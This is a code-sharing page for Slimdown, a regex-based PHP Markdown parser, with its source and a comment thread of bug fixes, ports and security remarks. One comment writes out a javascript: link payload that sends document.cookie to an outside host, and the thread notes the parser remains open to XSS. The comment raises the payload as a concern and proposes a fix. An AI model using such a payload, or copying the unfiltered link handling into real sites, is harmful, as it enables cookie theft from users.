Slimdown - A simple regex-based Markdown parser.

Slimdown

A very basic regex-based Markdown parser. Supports the following elements (and can be extended via Slimdown::add_rule()):

  • Headers
  • Links
  • Bold
  • Emphasis
  • Deletions
  • Quotes
  • Inline code
  • Blockquotes
  • Ordered/unordered lists
  • Horizontal rules

Usage

Here is the general use case:

<?php

require_once ('Slimdown.php');

echo Slimdown::render (
	"# Page title\n\nAnd **now** for something _completely_ different."
);

?>

Adding rules

A simple rule to convert :) to an image:

<?php

require_once ('Slimdown.php');

Slimdown::add_rule ('/(\W)\:\)(\W)/', '\1<img src="smiley.png" />\2');

echo Slimdown::render ('Know what I\'m sayin? :)');

?>

In this example, we add GitHub-style internal linking (e.g., [[Another Page]]).

<?php

require_once ('Slimdown.php');

function mywiki_internal_link ($regs) {
	// preg_replace_callback() passes the match array; index 1 is the page title.
	$title = $regs[1];
	return sprintf (
		'<a href="%s">%s</a>',
		preg_replace ('/[^a-zA-Z0-9_-]+/', '-', $title),
		$title
	);
}

Slimdown::add_rule ('/\[\[(.*?)\]\]/', 'mywiki_internal_link');

echo Slimdown::render ('Check [[This Page]] out!');

?>

A longer example

<?php

require_once ('Slimdown.php');

echo Slimdown::render ("# Title

And *now* [a link](http://www.google.com) to **follow** and [another](http://yahoo.com/).

* One
* Two
* Three

## Subhead

One **two** three **four** five.

One __two__ three _four_ five __six__ seven _eight_.

1. One
2. Two
3. Three

More text with `inline($code)` sample.

> A block quote
> across two lines.

More text...");

?>

Slimdown.php

<?php
/**
 * Slimdown - A very basic regex-based Markdown parser. Supports the
 * following elements (and can be extended via Slimdown::add_rule()):
 *
 * - Headers
 * - Links
 * - Bold
 * - Emphasis
 * - Deletions
 * - Quotes
 * - Inline code
 * - Blockquotes
 * - Ordered/unordered lists
 * - Horizontal rules
 *
 * Author: Johnny Broadway <johnny@johnnybroadway.com>
 * Website: https://gist.github.com/jbroadway/2836900
 * License: MIT
 */
class Slimdown {
	// Rules are applied in order. Callable values go through
	// preg_replace_callback(), everything else through preg_replace().
	public static $rules = array (
		'/(#+)(.*)/' => 'self::header', // headers
		'/\[([^\[]+)\]\(([^\)]+)\)/' => '<a href=\'\2\'>\1</a>', // links
		'/(\*\*|__)(.*?)\1/' => '<strong>\2</strong>', // bold
		'/(\*|_)(.*?)\1/' => '<em>\2</em>', // emphasis
		'/\~\~(.*?)\~\~/' => '<del>\1</del>', // del
		'/\:\"(.*?)\"\:/' => '<q>\1</q>', // quote
		'/`(.*?)`/' => '<code>\1</code>', // inline code
		'/\n\*(.*)/' => 'self::ul_list', // ul lists
		'/\n[0-9]+\.(.*)/' => 'self::ol_list', // ol lists
		'/\n(&gt;|\>)(.*)/' => 'self::blockquote', // blockquotes
		'/\n-{5,}/' => "\n<hr />", // horizontal rule
		'/\n([^\n]+)\n/' => 'self::para', // add paragraphs
		'/<\/ul>\s?<ul>/' => '', // fix extra ul
		'/<\/ol>\s?<ol>/' => '', // fix extra ol
		'/<\/blockquote><blockquote>/' => "\n" // fix extra blockquote
	);

	// Wrap a line in <p> unless it already starts with a block-level tag.
	private static function para ($regs) {
		$line = $regs[1];
		$trimmed = trim ($line);
		if (preg_match ('/^<\/?(ul|ol|li|h|p|bl)/', $trimmed)) {
			return "\n" . $line . "\n";
		}
		return sprintf ("\n<p>%s</p>\n", $trimmed);
	}

	// Each item gets its own list; the "fix extra" rules merge neighbours.
	private static function ul_list ($regs) {
		$item = $regs[1];
		return sprintf ("\n<ul>\n\t<li>%s</li>\n</ul>", trim ($item));
	}

	private static function ol_list ($regs) {
		$item = $regs[1];
		return sprintf ("\n<ol>\n\t<li>%s</li>\n</ol>", trim ($item));
	}

	private static function blockquote ($regs) {
		$item = $regs[2];
		return sprintf ("\n<blockquote>%s</blockquote>", trim ($item));
	}

	// The number of # characters sets the heading level.
	private static function header ($regs) {
		list ($tmp, $chars, $header) = $regs;
		$level = strlen ($chars);
		return sprintf ('<h%d>%s</h%d>', $level, trim ($header), $level);
	}

	/**
	 * Add a rule.
	 */
	public static function add_rule ($regex, $replacement) {
		self::$rules[$regex] = $replacement;
	}

	/**
	 * Render some Markdown into HTML.
	 */
	public static function render ($text) {
		$text = "\n" . $text . "\n";
		foreach (self::$rules as $regex => $replacement) {
			if (is_callable ($replacement)) {
				$text = preg_replace_callback ($regex, $replacement, $text);
			} else {
				$text = preg_replace ($regex, $replacement, $text);
			}
		}
		return trim ($text);
	}
}

ghost Jun 9, 2012

Double lines create a new paragraph, however if someone does...

this

the paragraph

function

will

skip every other line

alexanderGugel May 30, 2013

Simple, but great.

What about the license?

jbroadway Jun 24, 2013

Just added a license to the file. Let's go with MIT :)

greenphp Jul 8, 2013

Found a small bug. See the example!

The source markdown

An **indie electronica music** bundle.

**Featuring** songs by ...

Pay what you want for Music

Slimdown creates this HTML:

<p>
  An <strong>indie electronica music</strong> bundle.
</p>
<strong>Featuring</strong> songs by ...
<p>
  Pay what you want for Music
</p>

It should be this:

<p>
  An <strong>indie electronica music</strong> bundle.
</p>
<p>
   <strong>Featuring</strong> songs by ...
</p>
<p>
  Pay what you want for Music
</p>

filipkemuel Aug 17, 2013

Solution to above bug is simple. Simply replace

        '/\n([^\n]+)\n/e' => 'self::para (\'\\1\')',              // add paragraphs

with

        '/\n([^\n]+)/e' => 'self::para (\'\\1\')',              // add paragraphs

Then every line will become a paragraph.
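The difference between the two patterns can be checked in isolation. This is a minimal sketch, not the library's code: `wrap_p` is a hypothetical, simplified stand-in for `Slimdown::para()`, and the input uses single newlines between lines, which is where the original pattern skips every other line because each match consumes the newline the next match would need.

```php
<?php
// Hypothetical, simplified stand-in for Slimdown::para(): wrap every match in <p>.
function wrap_p ($regs) {
	return sprintf ("\n<p>%s</p>\n", trim ($regs[1]));
}

// Slimdown::render() pads the text with newlines before applying its rules.
$text = "\n" . "this\nthe paragraph\nfunction\nwill" . "\n";

// Original pattern: the trailing \n is consumed, so the following line has
// no leading \n left to match and is skipped.
$original = preg_replace_callback ('/\n([^\n]+)\n/', 'wrap_p', $text);

// Pattern from the comment above: the trailing \n stays available.
$relaxed = preg_replace_callback ('/\n([^\n]+)/', 'wrap_p', $text);

printf ("original: %d paragraphs\n", substr_count ($original, '<p>'));
printf ("relaxed: %d paragraphs\n", substr_count ($relaxed, '<p>'));
```

Note that the relaxed pattern wraps every line on its own, so consecutive lines no longer merge into a single paragraph.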

inf3rno Nov 9, 2013

You should never use this code on a website:

  • eval injection
  • XSS

josegonzalez Dec 25, 2013

No codeblock support :(

jbroadway Jan 11, 2014

Thanks @inf3rno, I've switched it to using preg_replace_callback() to prevent eval injection. XSS is still possible without further filtering, but that's not the purpose of this library (and technically Markdown supports arbitrary HTML too, so it ought to come from a trusted source).
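For untrusted input, one option is to escape HTML before rendering. The blockquote rule already accepts `&gt;` as well as `>`, so quotes survive the escaping. The sketch below is a partial measure under that assumption, with the blockquote pattern and output format copied inline so it runs without Slimdown.php. Link URLs would still reach the href attribute unchecked.

```php
<?php
$untrusted = "> quoted <script>alert(1)</script>";

// Escape &, < and > but leave quotes alone so the :"quote": syntax still matches.
$escaped = htmlspecialchars ($untrusted, ENT_NOQUOTES);

// Same pattern and output format as the blockquote rule in Slimdown::$rules.
$html = preg_replace_callback ('/\n(&gt;|\>)(.*)/', function ($regs) {
	return sprintf ("\n<blockquote>%s</blockquote>", trim ($regs[2]));
}, "\n" . $escaped);

echo trim ($html), "\n";
```

With the class itself, the equivalent call would presumably be `Slimdown::render (htmlspecialchars ($untrusted, ENT_NOQUOTES))`.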

paulcuth Feb 13, 2014

I've also ported this to Lua: https://gist.github.com/paulcuth/8967731

Cheers for the good work.

pph7 Apr 4, 2014

Great! Just a small bug: the line

'/\n(&gt;|\>)(.*)/' => 'self::blockquote ', 

contains an additional space after "blockquote", which prevents the function from being applied.

Anyway, thanx a lot!

funnylookinhat Dec 9, 2014

This has been incredibly useful - but I found an issue with links that have underscores... I'm honestly not sure if there would be an easy way to fix this without creating some hierarchy of rules.

Slimdown::render("# Links fail with underscores

[Test Link](http://www.google.com/?some_param=another_value)
");

Produces:

<h1>Links fail with underscores</h1>

<p><a href='http://www.google.com/?some<em>param=another</em>value'>Test Link</a></p>

In reality it should produce:

<h1>Links fail with underscores</h1>

<p><a href='http://www.google.com/?some_param=another_value'>Test Link</a></p>
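One possible workaround that avoids a rule hierarchy is to turn the link rule into a callback that entity-encodes `_` and `*` inside the URL, so the later emphasis rules have nothing to match. This is a sketch under that assumption; `slimdown_safe_link` is a hypothetical name, and the two patterns are copied from `Slimdown::$rules` so the example runs on its own.

```php
<?php
// Hypothetical callback: builds the anchor and entity-encodes the characters
// that the later bold/emphasis rules would otherwise treat as markup.
function slimdown_safe_link ($regs) {
	$url = strtr ($regs[2], array ('_' => '&#95;', '*' => '&#42;'));
	return sprintf ("<a href='%s'>%s</a>", $url, $regs[1]);
}

$text = '[Test Link](http://www.google.com/?some_param=another_value)';

// Link rule first, then emphasis, in the same order as Slimdown::$rules.
$text = preg_replace_callback ('/\[([^\[]+)\]\(([^\)]+)\)/', 'slimdown_safe_link', $text);
$text = preg_replace ('/(\*|_)(.*?)\1/', '<em>\2</em>', $text);

echo $text, "\n";
```

Browsers decode the entities inside the attribute, so the link target is unchanged. With Slimdown itself, passing the same link pattern to `Slimdown::add_rule()` should replace the built-in rule in place, because PHP arrays keep a key's position when its value is reassigned.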

philtune Mar 25, 2015

Not sure how to prevent the unnecessary paragraphs around block-level HTML...

<p><table></p>
    <tr><th>Balance</th><td>$2,000</td></tr>
<p><tr><th>APR</th><td>14.5%</td></tr></p>
    <tr><th>Estimated min. monthly payment</th><td>$40.00</td></tr>
<p><tr><th>Years to payoff</th><td>14</td></tr></p>
    <tr><th>Estimated total interest</th><td>$2,070</td></tr>
<p></table></p>

Ahh, just fixed it... I added those elements to the para() regex:

if (preg_match ('/^<\/?(ul|ol|li|h|p|bl|table|tr|td)/', $trimmed)) {
    return "\n" . $line . "\n";
}

Thanks so much for this gist!

philtune Mar 25, 2015

Also, I believe your header regex should start with a newline (\n)

'/\n(#+)(.*)/'

...to prevent things like <a href="<em>top</em>">Top</a>
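The effect of anchoring can be seen by running both patterns over the same text. This is a minimal sketch: `header_cb` copies the logic of `Slimdown::header()` so it runs standalone, and the wrapper that puts back the consumed newline is an addition of this sketch rather than part of the suggestion.

```php
<?php
// Same logic as Slimdown::header(), copied so the sketch runs standalone.
function header_cb ($regs) {
	list ($tmp, $chars, $header) = $regs;
	$level = strlen ($chars);
	return sprintf ('<h%d>%s</h%d>', $level, trim ($header), $level);
}

$text = "\n# Title\n\nJump to [Top](#top)\n";

// Unanchored: the # inside the link target is treated as a header too.
$loose = preg_replace_callback ('/(#+)(.*)/', 'header_cb', $text);

// Anchored: only a # at the start of a line matches. The wrapper re-emits
// the newline that the pattern consumed (an assumption of this sketch).
$strict = preg_replace_callback ('/\n(#+)(.*)/', function ($regs) {
	return "\n" . header_cb ($regs);
}, $text);

echo $loose, "----", $strict;
```

Without the re-emitted newline, a header in the middle of a document would be joined to the end of the preceding line.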

bennyn Apr 7, 2015

Thanks for sharing your Markdown parser! I just noticed that it matches only ***B** when your input is ***B***, so it fails to capture one asterisk for the strong/bold markup.

You can easily check that in the JavaScript console of your browser by using the RegEx from the Slimdown Parser for "strong":

"***B***".match(/(\*\*|__)(.*?)\1/g)

possatti Jun 5, 2015

Wow! I really like your idea of converting Markdown using only regex. I'm thinking of doing the same thing from Markdown to LaTeX some day. Until that happens, I created a similar Python script, based on your work, called Piedown. Hope it can be useful for someone.

arnaudjuracek Jul 1, 2015

Awesome, thanks!

Support for the image syntax ![Alt text](/path/to/img.jpg):

<?php
    unset(Slimdown::$rules['/\[([^\[]+)\]\(([^\)]+)\)/']);
    Slimdown::add_rule('/!\[([^\[]+)\]\(([^\)]+)\)/', '<img src=\'\2\' alt=\'\1\'>');
    Slimdown::add_rule('/\[([^\[]+)\]\(([^\)]+)\)/', '<a href=\'\2\'>\1</a>');
?>

renehamburger Sep 3, 2015

I've just ported this to JavaScript (ES5): slimdown.js.

tovic Feb 5, 2016

Just want to share my simple PHP Markdown parser. It supports code blocks and SmartyPants 😄 https://gist.github.com/tovic/f349cf63d644eec04fe9

handonam Mar 6, 2016

Great work!! My only concern was this [^\)] portion of the hyperlink set, which accepts anything except the ending ). Couldn't this theoretically be executed?

[My XSS Attempt](javascript:window.location="http://example.com?yourCookie=" + document.cookie)

That's something that kind of frightens me.

edit: would something like this maybe work?

/\[([^\[]+)\]\((?:javascript:)?([^\)]+)\)/

This would put javascript: as an optional non-capturing group, but still retain the other groups as intended.
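The optional group only removes an exact, lowercase `javascript:` prefix, so variants such as `JavaScript:` would still get through. A stricter alternative is to allow-list URL schemes in a callback. The following is a hedged sketch, not a complete XSS defence: `slimdown_checked_link` is a hypothetical name, and the list of allowed schemes is an assumption.

```php
<?php
// Hypothetical callback for the link pattern: drop the anchor unless the URL
// is relative or uses an allow-listed scheme.
function slimdown_checked_link ($regs) {
	$label = $regs[1];
	// Browsers strip tabs, newlines and leading whitespace from URLs, so
	// remove whitespace and control characters before inspecting the scheme.
	$url = preg_replace ('/[\x00-\x20]+/', '', $regs[2]);
	// Assumption: http, https and mailto are the only schemes to allow.
	$allowed = array ('http', 'https', 'mailto');
	if (preg_match ('/^([a-z][a-z0-9+.-]*):/i', $url, $m)
			&& ! in_array (strtolower ($m[1]), $allowed)) {
		return $label; // keep the link text, drop the link
	}
	return sprintf ("<a href='%s'>%s</a>", htmlspecialchars ($url, ENT_QUOTES), $label);
}

$pattern = '/\[([^\[]+)\]\(([^\)]+)\)/';
$bad = '[My XSS Attempt](javascript:window.location="http://example.com?yourCookie=" + document.cookie)';
$good = '[a link](http://www.google.com)';

echo preg_replace_callback ($pattern, 'slimdown_checked_link', $bad), "\n";
echo preg_replace_callback ($pattern, 'slimdown_checked_link', $good), "\n";
```

Escaping the URL with `ENT_QUOTES` also keeps a stray quote from closing the single-quoted href attribute.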

tonioloewald Mar 14, 2016

The regex for links should be [^\]] (anything but a closing bracket), not [^\[]
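A contrived input with a stray `]` shows where the two character classes diverge. This is only a sketch; the input string and the example.com-style hosts are made up for illustration, and the replacement string is the one from `Slimdown::$rules`.

```php
<?php
$text = '[a](http://a.example) b](http://b.example)';
$replacement = '<a href=\'\2\'>\1</a>';

// Current rule: the link text may contain "]", so it can run past the first link.
$current = preg_replace ('/\[([^\[]+)\]\(([^\)]+)\)/', $replacement, $text);

// Suggested class: the link text stops at the first "]".
$suggested = preg_replace ('/\[([^\]]+)\]\(([^\)]+)\)/', $replacement, $text);

echo $current, "\n", $suggested, "\n";
```

The trade-off is that the suggested class permits `[` inside the link text, which the current one rejects.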

bulrush15 Jun 8, 2016

Wow! This would be nice ported to Freepascal as a component. http://www.freepascal.org/. I'm stuck on converting MD to HTML lists because they are supposed to support lists within lists. I'm still new to Freepascal so I'm not good enough to convert it.

wwiechorek Oct 4, 2016

In the blockquote fix, I changed this:

'/<\/blockquote><blockquote>/' => "\n"

to:

'/<\/blockquote>\n<blockquote>/' => "<br>"
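The reason the newline matters can be checked directly. The sketch below assumes the blockquote callback has been applied (that is, without the stray space reported earlier in this thread), in which case each quoted line becomes its own element on its own line.

```php
<?php
// Assumed intermediate output of the blockquote rule for a two-line quote.
$html = "\n<blockquote>A block quote</blockquote>\n<blockquote>across two lines.</blockquote>\n";

// Pattern currently in Slimdown::$rules: needs the tags to be directly adjacent.
$current = preg_replace ('/<\/blockquote><blockquote>/', "\n", $html);

// Pattern from the comment above: allows for the newline between the tags.
$merged = preg_replace ('/<\/blockquote>\n<blockquote>/', '<br>', $html);

var_dump ($current === $html); // true when the current pattern changes nothing
echo trim ($merged), "\n";
```

Replacing with `"\n"` instead of `"<br>"` would merge the elements as well, leaving the line break to the browser's whitespace handling.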

WaKeMaTTa Oct 17, 2016

@jbroadway why did you create a gist and not a repo?

kiwichrish Nov 20, 2016

Hi. Very handy. Dropped it into CodeIgniter for a project. Are you still maintaining it? I found the space-after-blockquote error and went to push the change, then realised I can't for a gist.

robinchrist Apr 30, 2017

Hey,
I created a C++ port for a coding challenge: libMarkdownParser https://github.com/robinchrist/libMarkdownParser
Simple command line interface: https://github.com/robinchrist/MarkdownParserCLI

Have fun!

mischapeters Jul 18, 2017

Fix for when you want to use # in inline code or blockquote.
Replace: '/(#+)(.*)/' => 'self::header',
With: '/\n(#+)(.*)/' => 'self::header',
